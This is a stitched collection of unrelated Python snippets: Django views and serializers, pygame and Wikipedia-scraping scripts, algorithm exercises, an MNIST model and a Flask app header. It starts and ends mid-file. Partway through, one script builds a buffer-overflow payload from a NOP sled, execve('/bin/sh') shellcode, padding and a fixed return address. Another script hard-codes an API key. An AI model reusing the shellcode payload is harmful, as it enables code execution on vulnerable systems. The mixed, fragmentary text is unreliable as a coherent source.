if __name__ == '__main__':
    print(testRotation([2*pi, 0, 0]))
    print(testRotation([0, 2*pi, 0]))
    print(testRotation([0, 0, 2*pi]))
    print(testRotation([2*pi, 2*pi, 0]))
    print(testRotation([0, 2*pi, 2*pi]))
    print(testRotation([2*pi, 0, 2*pi]))
    print(testRotation([2*pi, 2*pi, 2*pi]))
    print(testinertialVector2BodyVector())
|
from django.contrib import admin

# Import the models explicitly instead of the original star import -- only
# these five names are used, and explicit imports keep the namespace clean.
from .models import (
    Paciente,
    Doctor,
    Parmetros_directos_sensados,
    Parametros_Borg,
    Parametros_Morisky,
)

# Register each clinical model so it is manageable in the Django admin site.
admin.site.register(Paciente)
admin.site.register(Doctor)
admin.site.register(Parmetros_directos_sensados)
admin.site.register(Parametros_Borg)
admin.site.register(Parametros_Morisky)
def gcd(a, b):
    """Return the greatest common divisor of a and b (Euclid's algorithm)."""
    while b:
        a, b = b, a % b
    return a
# Print a 19x19 table of gcd values.
# BUG FIX: the original used Python 2 print statements, which are a syntax
# error under Python 3; print() with end/sep reproduces the same layout.
for a in range(1, 20):
    for b in range(1, 20):
        print(gcd(a, b), '\t', end=' ')
    print()
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 9 02:23:31 2020
@author: DAW
"""
import functools
def multiplicar(x, y):
    """Return x*y, echoing the product (used as a reduce step below)."""
    producto = x * y
    print(producto)
    return producto
# Read N and compute N! by reducing the multiply function over 1..N.
numero = int(input("De que numero quieres calcular el factorial: "))
lista =range(1, numero+1)
for i in lista:
    print(i , "\n")
# reduce() folds multiplicar left-to-right over the range, yielding numero!.
valor= functools.reduce(multiplicar, lista)
print("\nResultado de ", numero ,"! = ", valor)
print("\n--------------\n")
# List-comprehension demos: cubes, even numbers, reciprocals.
lista =[1,2,3,4,5,6,7,8,9,10]
cubos = [valor**3 for valor in lista]
print("Cubos del 1 al 10: ", cubos)
divisible2 = [valor for valor in lista if valor%2==0]
print(divisible2)
def funcion(x):
    """Return the reciprocal of x."""
    return 1/x
print([funcion(i) for i in lista])
# lambda demo: rectangle area from a pair of side lengths.
area_cuadrado = lambda l1,l2 : l1*l2
cuadrados = [(2,2),(3,3),(4,4),(5,5)]
for i in cuadrados:
    lado1 = i[0]
    lado2 = i[1]
    print (area_cuadrado(lado1, lado2))
from pygame import *
from random import randint
# Create the 700x500 window and pre-scale the two backgrounds plus the
# character image to fill it. curfon holds the currently shown background.
okkno = display.set_mode((700, 500))
display.set_caption("mona")
fon1 = transform.scale(image.load('63.jpg'), (700,500))
fon2 = transform.scale(image.load('3.jpg'), (700,500))
dio = transform.scale(image.load('93.png'), (700,500))
curfon = fon1
class boop(sprite.Sprite):
    """Simple drawable sprite: an image scaled to 90x80 placed at (x, y)."""

    def __init__(self, img, x, y):
        super().__init__()
        # Load the texture and scale it to a fixed footprint.
        self.image = transform.scale(image.load(img), (90, 80))
        self.rect = self.image.get_rect()
        self.rect.x = x
        self.rect.y = y

    def pain(self):
        """Blit the sprite onto the global window at its rect position."""
        position = (self.rect.x, self.rect.y)
        okkno.blit(self.image, position)
txt = "наруто учил не сдаваться вот я и лежу"
txt2 = " нажми w затем s"
font.init()
shrift = font.Font(None, 30)
# n tracks the dialogue stage (1 -> 2 -> 3 -> 4, then back to 3).
n = 1
game = True
while game:
    # Redraw background, character and both text lines every frame.
    okkno.blit(curfon, (0, 0))
    okkno.blit(dio, (1, 100))
    t1 = shrift.render(txt, True, (255, 225, 225))
    okkno.blit(t1, (120, 370))
    t2 = shrift.render(txt2, True, (255, 225, 225))
    okkno.blit(t2, (120, 400))
    for i in event.get():
        if i.type == QUIT:
            game = False
        if i.type == KEYUP:
            if i.key == K_w and n == 1:
                txt = "*Яростно проснулся*"
            if i.key == K_s and n == 1:
                txt = "*Яростно лежит*"
                n = 2
                txt2 = " нажми a затем q"
            if i.key == K_a and n == 2:
                txt = "Больше не ложусь"
            if i.key == K_q and n == 2:
                txt = "Уже встал"
                n = 3
                curfon = fon2
                txt2 = " нажми w затем s"
            if i.key == K_w and n == 3:
                txt = "*Агресивно сел на кровать*"
            if i.key == K_s and n == 3:
                # BUG FIX: was `n == 4`, a no-op comparison, so the game could
                # never leave stage 3.
                n = 4
                txt = "*Протёр глаза руками*"
                txt2 = " нажми a затем q"
            # BUG FIX: these stage-4 handlers were copy-pasted with `n == 2`
            # guards, making them unreachable once stage 2 had passed.
            if i.key == K_a and n == 4:
                txt = "Больше не ложусь"
            if i.key == K_q and n == 4:
                txt = "Уже встал"
                # NOTE(review): returning to stage 3 loops the dialogue, as in
                # the original -- confirm this is intended.
                n = 3
                txt2 = " нажми w затем s"
    display.update()
from rest_framework import generics, status
from .serializers import UserProjectSerializer, UserEducationSerializer, UserExperienceSerializer
from rest_framework.response import Response
from authentication.models import User
from .models import UserEducation, UserProject, UserExperience
from rest_framework.views import APIView
from rest_framework.generics import ListAPIView
from rest_framework.permissions import IsAuthenticated
from django.core.exceptions import *
from rest_framework import permissions
from .permissions import *
from rest_framework.exceptions import ValidationError
from rest_framework.pagination import PageNumberPagination, LimitOffsetPagination
from rest_framework import filters
from .pagination import *
from django_filters.rest_framework import DjangoFilterBackend
# Create your views here.
class DetailsAPIView(APIView):
    """Generic retrieve/update/delete view for a user-owned detail model.

    Subclasses configure `serializer_class` and `model_class`.
    """
    serializer_class = None
    model_class = None

    def get_obj(self, request, id):
        """Return the instance with `id`, or raise a DRF ValidationError."""
        try:
            return self.model_class.objects.get(id=id)
        except self.model_class.DoesNotExist:
            raise ValidationError("No details found with this id")

    def get(self, request, id):
        """Retrieve a single object after the object-level permission check."""
        obj = self.get_obj(request, id=id)
        self.check_object_permissions(self.request, obj)
        serializer = self.serializer_class(obj)
        return Response({
            'status': True,
            'message': "user details",
            'data': serializer.data
        })

    def put(self, request, id):
        """Fully update an object; ownership is forced to the requester."""
        # BUG FIX: fetch the object before the try block -- if get_obj raised
        # ValidationError inside it, the handler hit an unbound `serializer`.
        details = self.get_obj(request, id=id)
        serializer = self.serializer_class(
            instance=details,
            data={**self.request.data, **{"user": request.user.pk}})
        try:
            if serializer.is_valid(raise_exception=True):
                serializer.save()
                return Response({'status': True,
                                 'message': "details updated successfully",
                                 'data': serializer.data})
        except ValidationError:
            return Response(serializer.errors)

    def patch(self, request, id):
        """Partially update an object; ownership is forced to the requester."""
        # Same unbound-`serializer` fix as put().
        details = self.get_obj(request, id=id)
        serializer = self.serializer_class(
            instance=details, partial=True,
            data={**self.request.data, **{"user": request.user.pk}})
        try:
            if serializer.is_valid(raise_exception=True):
                serializer.save()
                return Response({'status': True,
                                 'message': " details partially updated.",
                                 'data': serializer.data})
        except ValidationError:
            return Response(serializer.errors)

    def delete(self, request, id):
        """Delete the object (get_obj raises if it does not exist)."""
        details = self.get_obj(request, id=id)
        details.delete()
        # BUG FIX: the old success message claimed the object did not exist.
        return Response({"message": "user details deleted successfully"})
class ReadPostAPIView(generics.ListAPIView):
    """List (GET) and create (POST) endpoint for a user's own detail records.

    Subclasses set `serializer_class` and `model_class`; listing is limited to
    objects whose `user` field matches the requesting user.
    """
    serializer_class = None
    model_class = None
    def filter_queryset(self, queryset):
        """Run every configured filter backend over `queryset`."""
        for backend in list(self.filter_backends):
            queryset = backend().filter_queryset(self.request, queryset, self)
        return queryset
    def get(self, request, *args, **kwargs):
        """List the requester's records, search-filtered and paginated."""
        # filter_backends = (SearchFilter,)
        # details = self.model_class.objects.filter(user=request.user.pk)
        # user = self.request.user
        # return user.user_set.all() # queryset = self.filter_queryset(self.get_queryset())
        details = self.filter_queryset(self.model_class.objects.filter(user=request.user.pk))
        serializer = self.serializer_class(details, many=True)
        page = self.paginate_queryset(serializer.data)
        return self.get_paginated_response(page)
    def post(self, request, *args, **kwargs):
        """Create a record, forcing ownership to the requesting user."""
        try:
            serializer = self.serializer_class(data={**self.request.data, **{"user": request.user.pk}})
            if serializer.is_valid(raise_exception=True):
                serializer.save()
                return Response({'status': True,
                                 'message': ' details added successfully',
                                 'data': serializer.data})
        except ValidationError:
            return Response(serializer.errors)
        except Exception as e:
            # NOTE(review): broad catch that returns raw exception text with
            # HTTP 200 -- confirm this is intended rather than a 500.
            return Response(str(e))
class UserProjectView(ReadPostAPIView):
    """List/create UserProject records; searchable by title/description."""
    serializer_class = UserProjectSerializer
    model_class = UserProject
    permission_classes = [permissions.IsAuthenticatedOrReadOnly,
                          IsOwnerOrReadOnly]
    pagination_class = UserProjectViewPagination
    # filter_backends = [DjangoFilterBackend]
    filter_backends = (filters.SearchFilter,)
    search_fields = ['title', 'description', ]
class UserProjectDetails(DetailsAPIView):
    """Retrieve/update/delete a single UserProject."""
    serializer_class = UserProjectSerializer
    permission_classes = [IsAuthenticatedOrOwnerOrAdmin]
    model_class = UserProject
class UserExperienceView(ReadPostAPIView):
    """List/create UserExperience records; searchable by company/designation."""
    serializer_class = UserExperienceSerializer
    model_class = UserExperience
    permission_classes = [permissions.IsAuthenticatedOrReadOnly,
                          IsOwnerOrReadOnly]
    pagination_class = UserExperienceViewPagination
    filter_backends = (filters.SearchFilter,)
    search_fields = ['company_name', 'designation', ]
class UserExperienceDetails(DetailsAPIView):
    """Retrieve/update/delete a single UserExperience."""
    serializer_class = UserExperienceSerializer
    permission_classes = [IsAuthenticatedOrOwnerOrAdmin]
    model_class = UserExperience
class UserEducationView(ReadPostAPIView):
    """List/create UserEducation records; searchable by degree."""
    serializer_class = UserEducationSerializer
    model_class = UserEducation
    permission_classes = [permissions.IsAuthenticatedOrReadOnly,
                          IsOwnerOrReadOnly,
                          ]
    pagination_class = UserEducationViewPagination
    queryset = UserEducation.objects.all()
    filter_backends = (filters.SearchFilter,)
    search_fields = ['degree', ]
class UserEducationDetails(DetailsAPIView):
    """Retrieve/update/delete a single UserEducation."""
    serializer_class = UserEducationSerializer
    permission_classes = [IsAuthenticatedOrOwnerOrAdmin]
    model_class = UserEducation
|
from django import forms
from snippets.models import Comment
class SnippetForm(forms.Form):
    """Plain form for creating a snippet: a short title plus free-form content."""
    title=forms.CharField(label='Title',max_length=30)
    content=forms.CharField(label='Content',widget=forms.Textarea)
class CommentForm(forms.ModelForm):
    """ModelForm exposing only a Comment's content field."""
    class Meta :
        model=Comment
        fields=['content']
|
# -*- codinf:utf-8 -*-
from .my_map import Map
class Simulater(object):
    """Grid-world simulator: moves a player over a Map and returns rewards."""

    def __init__(self, file_name):
        """Load the map from `file_name` and place the player at the start."""
        self.sim_map = Map(file_name)
        self.reset()

    def map_size(self):
        """Return the size of the underlying map."""
        return self.sim_map.map_size()

    def printing(self):
        """Render the map with the player's current position."""
        self.sim_map.printing(self.player_x, self.player_y)

    def end_episode(self):
        """Return True when the player stands on the goal cell."""
        x = self.player_x == self.sim_map.goal_x
        y = self.player_y == self.sim_map.goal_y
        return x and y

    def reset(self):
        """Move the player back to the map's start cell."""
        self.player_x = self.sim_map.start_x
        self.player_y = self.sim_map.start_y

    def get_current(self):
        """Return the player's current (x, y) position."""
        return self.player_x, self.player_y

    def __call__(self, mode):
        """Apply one action ('UP'/'DOWN'/'LEFT'/'RIGHT') and return its reward.

        The move is only committed when the map says the target cell is
        enterable. Raises ValueError for an unknown action.
        (BUG FIX: the original called exit(), killing the whole interpreter
        on a single mistyped action.)
        """
        tmp_x, tmp_y = self.player_x, self.player_y
        if mode == 'UP':
            tmp_y -= 1
        elif mode == 'DOWN':
            tmp_y += 1
        elif mode == 'LEFT':
            tmp_x -= 1
        elif mode == 'RIGHT':
            tmp_x += 1
        else:
            raise ValueError("unknown action: %r" % (mode,))
        can_enter, reward = self.sim_map.get_can_enter_reward(tmp_x, tmp_y)
        if can_enter:
            self.player_x, self.player_y = tmp_x, tmp_y
        return reward
# Manual walkthrough on the default map: print the grid after each move.
if __name__ == '__main__':
    sim = Simulater('default.txt')
    sim.printing()
    sim('LEFT')
    sim.printing()
    sim('DOWN')
    sim.printing()
    sim('RIGHT')
    sim.printing()
    sim('UP')
    sim.printing()
    sim('RIGHT')
    sim.printing()
    sim('RIGHT')
    sim.printing()
    sim('RIGHT')
    sim.printing()
|
# Package version string.
Version = "3.50.0"
|
#!env python3
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import requests
import requests_cache
import re
# Cache HTTP responses in a local sqlite store for 2 hours so repeated runs
# do not re-hit Wikipedia.
requests_cache.install_cache('nobel_pages',\
        backend='sqlite', expire_after=7200)
def get_winner_nationality(w):
    """Scrape a laureate's Wikipedia infobox for their 'Nationality' field.

    Returns a dict with the laureate's name plus, when present, a
    'Nationality' key taken from the infobox table.
    """
    page = requests.get('http://en.wikipedia.org' + w['link'])
    tree = BeautifulSoup(page.content, 'lxml')
    person_data = {'name': w['name']}
    for row in tree.select('table.infobox tr'):
        header = row.select_one('th')
        # Rows without a <th> (or a 'Nationality' row without a <td>) are skipped.
        if header is None:
            continue
        if header.text == 'Nationality':
            cell = row.select_one('td')
            if cell is not None:
                person_data['Nationality'] = cell.text
    return person_data
def get_Nobel_winners(table):
    """Parse the laureates table into a list of
    {year, category, name, link} dicts (endnote anchors are skipped)."""
    cols = get_column_titles(table)
    winners = []
    for row in table.select('tr')[1:-1]:
        # BUG FIX: removed a dead `re.match(text, pattern)` call whose
        # arguments were swapped -- it used the cell text as the regex,
        # ignored the result, and could raise re.error on odd cell contents.
        year = int(re.match(r'^(\d+)', row.select_one('td').text).group(1))
        for i, td in enumerate(row.select('td')[1:]):
            for winner in td.select('a'):
                href = winner.attrs['href']
                if not href.startswith('#endnote'):
                    winners.append({
                        'year': year,
                        'category': cols[i]['name'],
                        'name': winner.text,
                        'link': winner.attrs['href']
                    })
    return winners
BASE_URL = 'http://en.wikipedia.org'
# httpheader に「User-Agent」属性を追加しないと、
# Wikipedia はリクエストを拒否する
HEADERS = {'User-Agent': 'Mozilla/5.0'}
def get_Nobel_soup():
    """Fetch the Nobel laureates list page and return its parsed tag tree."""
    page_url = BASE_URL + '/wiki/List_of_Nobel_laureates'
    # Wikipedia rejects requests that carry no User-Agent header.
    response = requests.get(page_url, headers=HEADERS)
    return BeautifulSoup(response.content, "lxml")
def get_column_titles(table):
    """Extract the Nobel prize categories from the table's header row.

    Returns a list of {'name', 'href'} dicts; href is None for header cells
    that carry no link. The first header cell (the year column) is skipped.
    """
    cols = []
    header_cells = table.select_one('tr').select('th')[1:]
    for th in header_cells:
        anchor = th.select_one('a')
        if anchor:
            cols.append({'name': anchor.text, 'href': anchor.attrs['href']})
        else:
            cols.append({'name': th.text, 'href': None})
    return cols
# Scrape the laureates table, then look up each of the first 50 winners'
# Wikipedia pages and report those with no Nationality in their infobox.
soup = get_Nobel_soup()
table = soup.select_one('table.sortable.wikitable')
winners = get_Nobel_winners(table)
wdata = []
# Inspect the first 50 laureates.
for w in winners[:50]:
    wdata.append(get_winner_nationality(w))
missing_nationality = []
for w in wdata:
    # Collect entries whose 'Nationality' field is missing.
    if not w.get('Nationality'):
        missing_nationality.append(w)
# Print the list of laureates with no nationality found.
print(missing_nationality)
|
import requests
import json
from os.path import dirname, abspath ,join
# Resolve the project root (two levels up from this file) ...
d = dirname(dirname(abspath(__file__))) #set files directory path
import sys
# insert at position 1 in the path, as 0 is the path of this file.
sys.path.insert(1, d)
# ... so the project-level Log module becomes importable.
import Log
def callApi(url, data, tokenKey):
    """POST utf-8 encoded `data` to `url` with a bearer token; return the raw
    response body as text."""
    request_headers = {
        'Content-Type': "application/json",
        'Authorization': "Bearer " + tokenKey,
        'Cache-Control': "no-cache",
    }
    response = requests.request(
        "POST", url, data=data.encode("utf-8"), headers=request_headers)
    return response.text
##################### Get Token by Api Key ##########################
# Exchange the API key for a bearer token at import time; tokenKey is then
# used by every subsequent API call.
# NOTE(review): the API key is hard-coded here -- move it to configuration
# or an environment variable.
baseUrl = "http://api.text-mining.ir/api/"
url = baseUrl + "Token/GetToken"
querystring = {"apikey":"bddb2a1d-ed80-eb11-80ee-98ded002619b"}
response = requests.request("GET", url, params=querystring)
data = json.loads(response.text)
tokenKey = data['token']
################## Call Swear Word Detector ######################
def SwearWordTagger(text, strictness):
    """Return True when `text` contains enough swear words for `strictness`.

    Sends the text to the remote SwearWordTagger endpoint and counts the
    'StrongSwearWord' / 'MildSwearWord' tags in the response; higher
    `strictness` values require more hits before returning True.
    NOTE(review): the guard accepts strictness >= 3 although both the inline
    comment and the logged error say "greater than 3" -- confirm which
    boundary is intended.
    """
    url = baseUrl + "TextRefinement/SwearWordTagger"
    # The endpoint expects the text as a JSON string literal.
    payload = "\""+text+"\""
    if strictness>=3 : #Strictness should be greater than 3.
        result = json.loads(callApi(url, payload, tokenKey))
        #print(result) #Show result of sent text. comment it if you dont want this
        # True when: many strong hits, OR the combined strong+mild count
        # exceeds strictness-2, OR mild hits alone exceed strictness.
        if list(result.values()).count('StrongSwearWord')>=int(strictness/3) or list(result.values()).count('StrongSwearWord')+list(result.values()).count('MildSwearWord')>=int(strictness-2) or list(result.values()).count('MildSwearWord')>=int(strictness):
            return True
        else:
            return False
    else:
        Log.error("Strictness should be greater than 3.", "tagger.py")
        return False
|
# Build [1, 2, 3, 4], then insert 5 at index 2 and show the result.
list1 = [1, 2, 3, 4]
list1.insert(2, 5)
print(list1)
from unittest import TestCase
import unittest
import sys
from insert_node_binarytree import Solution
sys.path.append('../')
from leetCodeUtil import TreeNode
class TestSolution(TestCase):
    """Unit tests for Solution.insertBinaryTreeNode (BST insertion)."""
    def test_insertNodeCase1(self):
        """Insert five values around root 5 and check the BFS ordering."""
        root = TreeNode(5)
        sol = Solution()
        sol.insertBinaryTreeNode(root, 3)
        sol.insertBinaryTreeNode(root, 7)
        sol.insertBinaryTreeNode(root, 1)
        sol.insertBinaryTreeNode(root, 6)
        sol.insertBinaryTreeNode(root, 9)
        # Level-order traversal should reflect BST placement of each value.
        result1 = list(root.getBFS(root))
        exp1 = [5, 3, 7, 1, 6, 9]
        self.assertListEqual(result1, exp1)
if __name__ == '__main__':
    unittest.main()
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.common.by import By
from selenium.common.exceptions import WebDriverException
class Checker:
    """Thin wrapper around a WebDriver for capturing named screenshots."""

    def __init__(self, driver, wait):
        # Keep references only; this class does not manage their lifecycle.
        self.driver = driver
        self.wait = wait

    def save_screenshot(self, service_name, item_name):
        """Save a PNG named '<service>-<item>' (lowercased, spaces removed)
        into the screenshots/ directory."""
        slug = f"{service_name}-{item_name}".replace(" ", "").lower()
        self.driver.save_screenshot(f"screenshots/{slug}.png")
|
class Solution(object):
    def findMinHeightTrees(self, n, edges):
        """
        :type n: int
        :type edges: List[List[int]]
        :rtype: List[int]

        Repeatedly strip the current leaves of the tree until at most two
        nodes remain; those survivors are the centroid(s), i.e. the roots of
        all minimum-height trees.
        """
        # Trivial trees: every node is a valid root.
        if n <= 2:
            return list(range(n))
        adjacency = {node: set() for node in range(n)}
        for u, v in edges:
            adjacency[u].add(v)
            adjacency[v].add(u)
        leaves = [node for node in range(n) if len(adjacency[node]) == 1]
        while len(adjacency) > 2:
            fresh_leaves = []
            for leaf in leaves:
                parent = adjacency.pop(leaf).pop()
                adjacency[parent].discard(leaf)
                if len(adjacency[parent]) == 1:
                    fresh_leaves.append(parent)
            leaves = fresh_leaves
        return list(adjacency)
def test():
    """Smoke-test findMinHeightTrees against known answers (order-insensitive)."""
    def check(n, edges, expected):
        got = Solution().findMinHeightTrees(n, edges)
        assert sorted(got) == sorted(expected)

    check(4, [[1, 0], [1, 2], [1, 3]], [1])
    check(6, [[0, 3], [1, 3], [2, 3], [4, 3], [5, 4]], [3, 4])
    check(2, [[0, 1]], [0, 1])
    check(1, [], [0])
|
# A Pythagorean triplet is a set of three natural numbers, a < b < c, for which,
# a^2 + b^2 = c^2
# For example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.
# There exists exactly one Pythagorean triplet for which a + b + c = 1000.
# Find the product abc.
def is_triplet(a, b, c):
    """Return True when a <= b <= c and a^2 + b^2 == c^2 (Pythagorean triplet)."""
    if a > b or b > c:
        return False
    return a ** 2 + b ** 2 == c ** 2
target = 1000

# For each pair (a, b) the perimeter constraint fixes c = target - a - b, so
# the original O(n^3) scan over all c values is unnecessary; this prints the
# same triplet(s) and product(s) in O(n^2).
for a in range(1, target):
    for b in range(a, target):
        c = target - a - b
        if c < b:
            break  # c only shrinks as b grows; no valid a <= b <= c remains
        if is_triplet(a, b, c):
            print([a, b, c])
            print([a * b * c])
|
import csv
import io
import json
from rest_framework import status
from rest_framework.viewsets import ModelViewSet, ViewSet
from rest_framework.mixins import CreateModelMixin
from rest_framework.parsers import FileUploadParser
from rest_framework.response import Response
from .models import Passenger
from .serializers import PassengerSerializer, PassengerFileUploadSerializer, PassengerCSVRowSerializer
class PassengerViewSet(ModelViewSet):
    """Standard CRUD endpoint over all Passenger records."""
    queryset = Passenger.objects.all()
    serializer_class = PassengerSerializer
class PassengerUploadCSVViewset(CreateModelMixin, ViewSet):
    """Accept a CSV file upload and create a Passenger per valid row."""
    file_serializer_class = PassengerFileUploadSerializer
    passenger_serializer_class = PassengerSerializer
    passenger_csv_row_serializer_class = PassengerCSVRowSerializer

    def create(self, request, *args, **kwargs):
        """Parse the uploaded CSV and persist each valid row.

        Invalid rows are skipped silently (original behavior kept).
        Returns 204 on completion.
        """
        serializer = self.file_serializer_class(data=request.data)
        serializer.is_valid(raise_exception=True)
        file = serializer.validated_data['file']
        decoded_file = file.read().decode().splitlines()
        reader = csv.DictReader(decoded_file)
        for row in reader:
            row_serializer = self.passenger_csv_row_serializer_class(data=row)
            if row_serializer.is_valid():
                # BUG FIX: Serializer.create expects validated_data; passing
                # `.data` (the re-serialized representation) hands the model
                # primitive values instead of the validated/converted ones.
                row_serializer.create(row_serializer.validated_data)
        return Response(status=status.HTTP_204_NO_CONTENT)
from DataPoint import DataPoint
# store and array of data so it can be easily drawn on screen
class Data:
    """Holds a collection of DataPoint objects so they can be drawn on screen."""

    def populate_list(self):
        """Append `size` fresh random data points bounded by [min, max]."""
        for _ in range(self.size):
            self.my_list.append(DataPoint(self.min, self.max))

    def __init__(self, min, max, size):
        """
        min:  minimum number a data point can be
        max:  maximum number a data point can be
        size: how many data points the list will contain
        """
        self.min = min
        self.max = max
        self.size = size
        self.my_list = []
        self.populate_list()

    def randomize(self, min, max, size):
        """Discard all current points and repopulate with new random data
        under the given bounds and count."""
        self.min = min
        self.max = max
        self.size = size
        self.my_list.clear()
        self.populate_list()

    def draw(self, screen):
        """Draw every data point, passing its index for placement."""
        for i in range(self.size):
            self.my_list[i].draw(screen, i)
|
#!/usr/bin/python
import subprocess
# Build a classic stack-smashing payload: NOP sled + execve("/bin/sh")
# shellcode + padding + return address, then print it as hex escapes.
shell_code = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
nopsled = '\x90' * 116
padding = 'A' * (446 - 116 - 32)
eip = '\x40\xf6\xff\xbf'
r = nopsled + shell_code + padding + eip
# Python 3 port: str.encode('hex') and the bare print statement are
# Python-2-only; format each character's code point as two hex digits.
pp = '\\x'.join(format(ord(ch), '02x') for ch in r)
print(pp)
|
#import the necessary packages
from os import path
# define the base path to the emotion dataset
# Absolute root of the FER-2013 emotion-recognition project tree.
BASE_PATH = r"C:\Users\schma\Documents\4th Yr\FYP\FINALE\FYP_Software201819\fer_model"
# Raw FER-2013 CSV the HDF5 datasets are built from.
INPUT_PATH = path.sep.join([BASE_PATH, r"fer2013\datasets\fer2013.csv"])
# define the number of classes (set to 6 if you are ignoring "disgust" class
NUM_CLASSES = 6
print(INPUT_PATH)
# Pre-built train/validation/test HDF5 dataset locations.
TRAIN_HDF5 = path.sep.join([BASE_PATH, r"fer2013\hdf5\train.hdf5"])
VAL_HDF5 = path.sep.join([BASE_PATH, r"fer2013\hdf5\val.hdf5"])
TEST_HDF5 = path.sep.join([BASE_PATH, r"fer2013\hdf5\test.hdf5"])
#define the batch size
BATCH_SIZE = 128
# define the path to where output logs will be stored
OUTPUT_PATH = path.sep.join([BASE_PATH, r"fer2013\output"])
|
from rest_framework import serializers
from inventory.models import InventoryItem, Vendor, PurchaseRecord, VendorVisit
class InventoryItemSerializer(serializers.ModelSerializer):
    """Full-field serializer for InventoryItem with immutable timestamps."""
    class Meta:
        model = InventoryItem
        fields = '__all__'
        # BUG FIX: the DRF Meta option is `read_only_fields`; the original
        # `read_only` attribute was silently ignored, leaving the timestamps
        # writable.
        read_only_fields = ('created_at', 'updated_at')
class VendorSerializer(serializers.ModelSerializer):
    """Full-field serializer for Vendor."""
    class Meta:
        model = Vendor
        fields = '__all__'
class PurchaseRecordSerializer(serializers.ModelSerializer):
    """Full-field serializer for PurchaseRecord with immutable timestamps."""
    class Meta:
        model = PurchaseRecord
        fields = '__all__'
        # BUG FIX: the DRF Meta option is `read_only_fields`; `read_only`
        # was silently ignored.
        read_only_fields = ('created_at', 'updated_at')
class VendorVisitSerializer(serializers.ModelSerializer):
    """Serializer for VendorVisit; stamps the requesting user on every write."""
    class Meta:
        model = VendorVisit
        fields = '__all__'
        # BUG FIX: the DRF Meta option is `read_only_fields`; `read_only`
        # was silently ignored.
        read_only_fields = ('created_at', 'updated_at')

    def validate(self, data):
        """Record which authenticated user performed this write."""
        data['updated_by_id'] = self.context['request'].user.id
        return data
|
# Generated by Django 3.0.8 on 2020-07-14 19:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Adds the foreign keys linking review models to trips and profiles.

    Each FK defaults to 0 and uses SET_DEFAULT on delete, so deleting the
    referenced row repoints the review at the default id 0.
    """
    initial = True
    dependencies = [
        ('profiles', '0001_initial'),
        ('profiles', '0004_auto_20200715_0302'),
        ('trips', '0001_initial'),
        ('reviews', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='travelerreviews',
            name='tripID',
            field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.SET_DEFAULT, to='trips.Trip'),
        ),
        migrations.AddField(
            model_name='guidereviews',
            name='senderID',
            field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.SET_DEFAULT, to='profiles.Guides'),
        ),
        migrations.AddField(
            model_name='guidereviews',
            name='travelerID',
            field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.SET_DEFAULT, to='profiles.Travelers'),
        ),
        migrations.AddField(
            model_name='guidereviews',
            name='tripID',
            field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.SET_DEFAULT, to='trips.Trip'),
        ),
    ]
|
# Read N (< 40) and print the N-th Fibonacci number via iterative pair swap.
N=int(input("输入一个整数N(N<40):"))
a=0
b=1
if(N>=40):
    print("超出范围,请重新输入!")
else:
    # After N-1 swaps, b holds the N-th Fibonacci number (1, 1, 2, 3, ...).
    for i in range(1,N):
        a,b=b,a+b
    print(b)
|
import tensorflow as tf
mnist = tf.keras.datasets.mnist # Getting the mnist dataset (huge dataset of written numbers)
(train_data, train_label), (test_data, test_label) = mnist.load_data() # Splitting dataset into training and testing data
# Normalizing the data to make it easier and faster to compute
train_data = tf.keras.utils.normalize(train_data, axis=1)
test_data = tf.keras.utils.normalize(test_data, axis=1)
# Creating a basic feedforward model
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28,28)), # The input layer that flattens out the 28x28 matrix for each number
tf.keras.layers.Dense(units=128, activation='relu'), # A layer where all the neurons are connected between previous and next layers, more units = more neurons and more complex
tf.keras.layers.Dense(units=128, activation='relu'), # Second hidden layer that connects to one above it
tf.keras.layers.Dense(units=10, activation='softmax') # Output layer that has 10 neurons (one for each number), softmax will scale down all activations of neurons such that all add up to 1 and gives the probability of getting a number
])
model.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy']) # Creates the model given everything above
model.fit(train_data, train_label, epochs=6) # Trains the model created above, Epochs = how many times are we gonna run the model with the same data
# Evaluates the loss and accuracy of the model as we go and prints it out
loss, accuracy = model.evaluate(test_data, test_label)
print(accuracy)
print(loss)
model.save('digits_detect.model') # Saves the model so I don't have to rerun it everytime I wanna use it |
#import sys
#input = sys.stdin.readline
def main():
    """Read three box dimensions from stdin; print the smallest face area
    when all three are odd, otherwise print 0."""
    a, b, c = map(int, input().split())
    # Equivalent to "any side even -> 0" via De Morgan.
    if a % 2 and b % 2 and c % 2:
        print(min(a * b, b * c, c * a))
    else:
        print(0)
# Run only when executed as a script.
if __name__ == '__main__':
    main()
|
__author__='RodrigoMachado'
__license__ = "MIT"
__version__ = "1.0.1"
__status__ = "Production"
__copyright__ = "Copyright 2019"
__maintainer__ = "RodrigoMachado9"
__email__ = "rodrigo.machado3.14@hotmail.com"
__credits__ = ["Python is life", "Live the opensource world"]
from flask import Flask, jsonify
from flask_restful import Api
#todo; resources
from resources.motorista import Motoristas, Motorista, MotoristasLocalCarga, CaminhoneirosVeiculoProprio, \
CaminhoneirosOrigemDestino, CaminhoneiroAvaliacao, CaminhoneirosDisponiveis
from resources.usuario import User, UserRegister, UserLogin, UserLogout, Users
from resources.tipoveiculo import TipoVeiculos, TipoVeiculo
from resources.veiculo import Veiculos, Veiculo
#todo; construir endpoint => veiculo, status_veiculo
from resources.statusveiculo import Status, StatusVeiculo
from resources.carga import Cargas, Carga
from resources.localcarga import LocalCargas, LocalCarga
from resources.transporte import Transportes, Transporte
# todo-> flask_jwt_extended :: será responsável por cuidar de toda parte de tokenização
from flask_jwt_extended import JWTManager
#todo guarda o token para futura verificação
from blacklist import BLACKLIST
# --- Flask application and JWT setup -----------------------------------------
app = Flask(__name__)
# TODO: sqlite -> migrate to postgres
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///dummy.db'
